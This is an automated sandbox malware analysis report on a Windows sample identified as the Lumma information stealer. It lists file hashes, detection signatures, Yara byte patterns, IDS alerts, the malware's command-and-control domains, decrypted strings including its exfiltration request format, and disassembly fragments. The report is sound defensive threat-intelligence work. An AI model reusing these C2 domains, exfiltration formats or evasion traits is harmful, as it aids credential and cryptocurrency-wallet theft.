Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N1sb7Ii2YD.exe

Overview

General Information

Sample name:N1sb7Ii2YD.exe
renamed because original name is a hash value
Original sample name:b5bd4911ad7b091685625baf619caa97.exe
Analysis ID:1576506
MD5:b5bd4911ad7b091685625baf619caa97
SHA1:a0faccca478bc35ede6bf4b36fccf3ca4388ed28
SHA256:660ed48c61433adf4a2ccd04430982a3c3b8a8cb6159b4b6962f92978df215e6
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • N1sb7Ii2YD.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\N1sb7Ii2YD.exe" MD5: B5BD4911AD7B091685625BAF619CAA97)
    • WerFault.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0.3.N1sb7Ii2YD.exe.2190000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0.3.N1sb7Ii2YD.exe.2190000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.2.N1sb7Ii2YD.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.N1sb7Ii2YD.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:03.510446+010020283713Unknown Traffic192.168.2.649707178.62.201.34443TCP
                  2024-12-17T08:14:06.990392+010020283713Unknown Traffic192.168.2.649709178.62.201.34443TCP
                  2024-12-17T08:14:09.970138+010020283713Unknown Traffic192.168.2.649716104.121.10.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:04.152053+010020546531A Network Trojan was detected192.168.2.649707178.62.201.34443TCP
                  2024-12-17T08:14:07.566782+010020546531A Network Trojan was detected192.168.2.649709178.62.201.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:04.152053+010020498361A Network Trojan was detected192.168.2.649707178.62.201.34443TCP
                  2024-12-17T08:14:07.566782+010020498361A Network Trojan was detected192.168.2.649709178.62.201.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:06.990392+010020582151Domain Observed Used for C2 Detected192.168.2.649709178.62.201.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:03.510446+010020582231Domain Observed Used for C2 Detected192.168.2.649707178.62.201.34443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:08.142354+010020582101Domain Observed Used for C2 Detected192.168.2.6647941.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:04.220521+010020582141Domain Observed Used for C2 Detected192.168.2.6557981.1.1.153UDP
                  2024-12-17T08:14:05.223602+010020582141Domain Observed Used for C2 Detected192.168.2.6557981.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:07.859906+010020582161Domain Observed Used for C2 Detected192.168.2.6531581.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:07.711603+010020582181Domain Observed Used for C2 Detected192.168.2.6586941.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:07.570159+010020582201Domain Observed Used for C2 Detected192.168.2.6534371.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:00.730618+010020582221Domain Observed Used for C2 Detected192.168.2.6558501.1.1.153UDP
                  2024-12-17T08:14:01.739254+010020582221Domain Observed Used for C2 Detected192.168.2.6558501.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:00.587344+010020582261Domain Observed Used for C2 Detected192.168.2.6577891.1.1.153UDP
                  2024-12-17T08:14:08.288529+010020582261Domain Observed Used for C2 Detected192.168.2.6541171.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:08.000796+010020582361Domain Observed Used for C2 Detected192.168.2.6646561.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:03.514331+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.649707TCP
                  2024-12-17T08:14:06.997138+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.649709TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-17T08:14:10.793779+010028586661Domain Observed Used for C2 Detected192.168.2.649716104.121.10.34443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: N1sb7Ii2YD.exeAvira: detected
                  Source: https://immureprech.biz/apisVAvira URL Cloud: Label: malware
                  Source: https://sordid-snaked.cyou/apizoAvira URL Cloud: Label: malware
                  Source: https://debonairnukk.xyz/apihoAvira URL Cloud: Label: malware
                  Source: https://awake-weaves.cyou/api1uoiAvira URL Cloud: Label: malware
                  Source: https://wrathful-jammy.cyou/apijAvira URL Cloud: Label: malware
                  Source: 0.2.N1sb7Ii2YD.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "diffuculttan.xyz"], "Build id": "4h5VfH--"}
                  Source: N1sb7Ii2YD.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: N1sb7Ii2YD.exeJoe Sandbox ML: detected
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000003.2137261655.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeUnpacked PE file: 0.2.N1sb7Ii2YD.exe.400000.0.unpack
                  Source: N1sb7Ii2YD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.6:49716 version: TLS 1.2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_0043CD60
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp al, 2Eh0_2_00426054
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_00426054
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B068
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B068
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_0040E83B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_0043B05B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B05B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0040A940
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, ecx0_2_0040A940
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_0040C917
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp ecx0_2_0043C1F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00425990
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, di0_2_00425990
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_0043B195
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_0043B9A1
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_004369A0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_0041E9B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004299B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_0042526A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebx, edi0_2_0041D270
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov esi, eax0_2_00423A34
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_0043D2F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_0043D2F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp ecx0_2_0043C280
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_00415298
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00415298
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0043AAB2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_004252BA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_004252BA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov eax, ebx0_2_0041CB05
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_0043CB20
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, eax0_2_00427326
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_004143C2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]0_2_004143C2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0042A3D0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042C45C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00436C00
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4FC
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042B4FC
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_00418578
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, eax0_2_0042750D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_00421D10
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_0040DD25
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, edx0_2_0040BDC9
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_00417582
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00427DA2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_004205B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C64A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042AE48
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_00426E50
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_0042B4F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042B4F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042AE24
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00433630
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C6E4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00425E90
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_0043CE90
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004166A0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041BEA0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_0042ADF4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov eax, edx0_2_0041C6BB
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_0043BF40
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00415F66
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_0043A777
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_00409700
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_00409700
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_00409700
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C726
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_0042C735
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0040CFF3
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0040CFF3
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0041DF80
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_0040D7A2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AB08B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AB0AF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h0_2_009BD0F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_009A60F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_009A70E4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, edx0_2_0098C030
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0099E1E7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AB05B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_009BB2CF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_009BB2CF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_009BB2C4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_009BB2C4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0098D25A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]0_2_0098D25A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_009BC268
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp al, 2Eh0_2_009A63B6
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_009BB3FC
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h0_2_009BB2C2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]0_2_009BB2C2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]0_2_009A54D1
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ebx, edi0_2_0099D4D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h0_2_009A559D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_009A55B3
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h0_2_009A552B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0099C528
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h0_2_009BD557
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, word ptr [eax]0_2_009BD557
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]0_2_0099554C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]0_2_00996544
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AC6C3
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_009AA637
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp ecx0_2_009BC79B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov edx, eax0_2_009A7797
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]0_2_009987DF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]0_2_009977E9
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then jmp eax0_2_009A6739
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_009AB763
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AB763
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_009B3897
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_009AC8B1
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h0_2_009A0817
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_00994806
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]0_2_009AB75E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov ecx, eax0_2_009AB75E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_009AC99C
